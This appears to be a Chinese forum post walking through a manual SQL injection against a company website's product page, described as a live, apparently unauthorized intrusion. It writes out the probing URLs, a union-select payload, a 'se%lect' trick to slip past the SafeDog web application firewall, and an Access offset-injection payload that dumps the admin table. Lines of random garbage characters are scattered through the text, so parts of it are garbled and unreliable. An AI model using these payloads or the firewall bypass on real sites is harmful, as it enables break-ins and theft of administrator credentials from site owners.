打开网站,一个企业站。
9 V& o' M0 ~# [, A
, M; Z. g z# | ~9 H4 @
7 h0 E" J0 a5 ?, K顺手加个admin5 l1 N" ?& @0 s6 [" e0 e
- L4 m6 v8 {& q5 N3 Z, q
0 H( _( [* Z' M! b$ H s* H$ \默认后台。/ \8 n: `1 ^& S: W* C
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。# @- G* L, s( ]% ]# T. @
2 R* x" Z$ `* f9 _8 U- V7 [9 N% a5 R' |2 [5 {; z$ c/ y
! q4 G. Q$ ` r6 Q( b3 v, [
所以就不用御剑扫了,待会直接封IP。
, T, f% q' W" O. L; i% i9 {
+ [3 k1 y9 {" g# h0 M" f: b) b用order by语句判断是否存在注入。
3 q/ r/ z4 o9 S: j0 Y3 r/ Vhttp://www.xxx.com /product_show.asp?id=997 order by 1
' ~. c' s( K6 i# fhttp://www.xxx.com /product_show.asp?id=997 order by 100 ~9 H$ @/ @8 _
现在存在注入,经测试后发现是9个字段。
; g$ z) @2 m. i0 w / t% O, f! T7 `+ p7 g" G
接下来进行联合查询,猜是否存在admin表。
/ p! E+ ?3 }/ ^1 H0 C& J+ v) O7 Fhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
; F. [$ R4 Y, E
4 t/ h% P1 h. e }1 n- s }( K% r7 T# c3 B7 U/ ~0 u) u
( U% h7 ]" s+ F6 Q
在select中间加个%,se%lect绕过安全狗。) h3 k% ]4 n. v% k
1 T/ _' g6 `* S0 z. V$ K
6 x2 `, l( z0 Q" D发现存在admin表,然后开始手工猜常用的字段。
1 H# d8 \1 m6 _, h$ k! b$ U5 q7 K纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
& Y2 B' v# S/ ^, f
@2 j, \' ]. }+ I7 @: p突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。! i* M1 v) M* K4 Y: F& r
0 P, z3 q8 N: O9 L* X. X j
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
; E; K- m& T- n1 `0 B- j/ r/ {. {http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
' Z2 p6 E1 f9 u H B2 I+ ]0 J好了,敏感内容出显了。
7 ?2 O1 O% Z% }! n4 I; R* \
) e9 D$ W& |, r. q5 n1 x) d: a' H; o& r$ r( v
# t. h, h2 ^, j) I/ Y; u |